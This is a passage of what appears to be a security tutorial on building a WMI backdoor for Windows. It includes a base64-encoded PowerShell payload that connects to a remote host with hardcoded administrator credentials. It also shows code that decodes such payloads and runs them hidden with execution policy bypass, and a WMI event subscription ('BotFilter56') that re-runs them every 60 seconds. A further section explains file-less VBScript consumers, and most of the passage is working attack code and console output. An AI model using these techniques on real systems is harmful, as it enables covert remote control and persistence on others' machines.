QAIAA9ACAAJwAxAHEAYQB6ACEAUQBBAFoAJwAKACQATwBwAHQAaQBvAG4AcwAuAEUAbgBhAGIAbABlAFAAcgBpAHYAaQBsAGUAZwBlAHMA
IAA9ACAAJABUAHIAdQBlAAoAJABDAG8AbgBuAGUAYwB0AGkAbwBuACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQ
BtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABTAGMAbwBwAGUACgAkAEMAbwBuAG4AZQBjAHQAaQBvAG4ALgBQAGEAdABoACAAPQAg
ACcAXABcADEANwAyAC4AMQA2AC4AMQAuADIAMAAxAFwAcgBvAG8AdABcAGMAaQBtAHYAMgAnAAoAJABDAG8AbgBuAGUAYwB0AGkAbwBuAC
4ATwBwAHQAaQBvAG4AcwAgAD0AIAAkAE8AcAB0AGkAbwBuAHMACgAkAEMAbwBuAG4AZQBjAHQAaQBvAG4ALgBDAG8AbgBuAGUAYwB0ACgA
KQAKACQARQB2AGkAbABDAGwAYQBzAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbg
BhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACQAQwBvAG4AbgBlAGMAdABpAG8AbgAsACAAWwBTAHQAcgBpAG4AZwBdADoAOgBFAG0AcAB0
AHkALAAgACQAbgB1AGwAbAApAAoAJABFAHYAaQBsAEMAbABhAHMAcwBbACcAXwBfAEMATABBAFMAUwAnAF0AIAA9ACAAJwBXAGkAbgAzAD
IAXwBDAG8AbQBtAGEAbgBkAFQAZQBzAHQAJwAKACQARQB2AGkAbABDAGwAYQBzAHMALgBQAHIAbwBwAGUAcgB0AGkAZQBzAC4AQQBkAGQA
KAAnAEkAUAAxADcAMgAxADYAMQAyADEAMQAnACwAIABbAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBDAGkAbQBUAHkAcABlAF0AOgA6AFMAdA
ByAGkAbgBnACwAIAAkAEYAYQBsAHMAZQApAAoAJABFAHYAaQBsAEMAbABhAHMAcwAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAEkAUAAx
ADcAMgAxADYAMQAyADEAMQAnAF0ALgBWAGEAbAB1AGUAIAA9ACIAUgB1AG4AIABDAG8AbQBtAGEAbgBkACAAVABlAHMAdAAhACIAIAAKAC
QARQB2AGkAbABDAGwAYQBzAHMALgBQAHUAdAAoACkAIAA=
Type : String
IsLocal : True
IsArray : False
Origin : Win32_Command
Qualifiers : {CIMTYPE}
- The client reads the instruction, decodes it and executes it
# Read the encoded payload
$EncodedPayload=([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
# Execute it with PowerShell
$PowerShellPayload = "powershell -ep bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -enc $EncodedPayload"
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $PowerShellPayload
# Show the decoded instruction
$bytes2 = [System.Convert]::FromBase64String($EncodedPayload)
$decoded = [System.Text.Encoding]::Unicode.GetString($bytes2)
"decoded Payload:"
$decoded
PS C:\Windows\system32> $decoded
$Options = New-Object Management.ConnectionOptions
$Options.Username = 'makapaka.garden\administrator'
$Options.Password = '1qaz!QAZ'
$Options.EnablePrivileges = $True
$Connection = New-Object Management.ManagementScope
$Connection.Path = '\\172.16.1.201\root\cimv2'
$Connection.Options = $Options
$Connection.Connect()
$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
$EvilClass['__CLASS'] = 'Win32_CommandTest'
$EvilClass.Properties.Add('IP172161211', [Management.CimType]::String, $False)
$EvilClass.Properties['IP172161211'].Value ="Run Command Test!"
$EvilClass.Put()
- Run on the server to view the result
([WmiClass] 'Win32_CommandTest').Properties['IP172161211']
PS C:\Users\admin> ([WmiClass] 'Win32_CommandTest').Properties['IP172161211']
Name : IP172161211
Value : Run Command Test!
Type : String
IsLocal : True
IsArray : False
Origin : Win32_CommandTest
Qualifiers : {CIMTYPE}
- The client runs the PowerShell command on a timer
# Read the encoded instruction
$EncodedPayload=([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
$filterName = 'BotFilter56'
$consumerName = 'BotConsumer56'
# Create an __EventFilter that sets the trigger condition: fire once every 60 s
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
# Create a CommandLineEventConsumer that sets the action to run
$Arg =@{
Name=$consumerName
CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -enc $EncodedPayload"
}
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg
# Bind the filter to the consumer
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
PS C:\Windows\system32> Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
__GENUS : 2
__CLASS : __FilterToConsumerBinding
__SUPERCLASS : __IndicationRelated
__DYNASTY : __SystemClass
__RELPATH : __FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"BotConsumer56\"",Filter="__EventFilter.Name=\"BotFilter56\""
__PROPERTY_COUNT : 7
__DERIVATION : {__IndicationRelated, __SystemClass}
__SERVER : DEVC1
__NAMESPACE : ROOT\subscription
__PATH : \\DEVC1\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"BotConsumer56\"",Filter="__EventFilter.Name=\"BotFilter56\""
Consumer : CommandLineEventConsumer.Name="BotConsumer56"
CreatorSID : {1, 5, 0, 0...}
DeliverSynchronously : False
DeliveryQoS :
Filter : __EventFilter.Name="BotFilter56"
MaintainSecurityContext : False
SlowDownProviders : False
PSComputerName : DEVC1
Detection method: see @0x04 Application: WMI backdoor detection and removal [administrator privileges]
WMI backdoor background (further notes on the timed-start feature)
1. EventFilter: sets the trigger condition by running a WQL query; the query types are:
(1)Data queries
SELECT * FROM Win32_NTLogEvent WHERE Logfile = 'Application'
(2)Event queries
SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Service' AND TargetInstance._Class = 'win32_TerminalService'
(3)Schema queries
SELECT * FROM meta_class WHERE __this ISA "Win32_BaseService"
2. Consumer: the action executed once the condition is met; the consumer classes are:
(1)ActiveScriptEventConsumer
(2)LogFileEventConsumer
(3)NTEventLogEventConsumer
(4)SMTPEventConsumer
(5)CommandLineEventConsumer
3. Two ways to run a VBS script with a consumer
(1) Run an existing script file directly
instance of ActiveScriptEventConsumer as $Cons
{
Name = "ASEC";
ScriptingEngine = "VBScript";
ScriptFileName = "c:\\asec2.vbs";
};
(2) Embed the script inline, which leaves no script file on disk
instance of ActiveScriptEventConsumer as $Cons
{
Name = "ASEC";
ScriptingEngine = "VBScript";
ScriptText =
"Dim objFS, objFile\n"
"Set objFS = CreateObject(\"Scripting.FileSystemObject\")\n"
"Set objFile = objFS.OpenTextFile(\"C:\\ASEC.log\","
" 8, true)\nobjFile.WriteLine \"Time: \" & Now & \";"
" Entry made by: ASEC\"\nobjFile.WriteLine"
" \"Application closed. UserModeTime: \" & "
"TargetEvent.TargetInstance.UserModeTime &_\n"
"\"; KernelModeTime: \" & "
"TargetEvent.TargetInstance.KernelModeTime "
"& \" [hundreds of nanoseconds]\"\n"
"objFile.Close\n";
};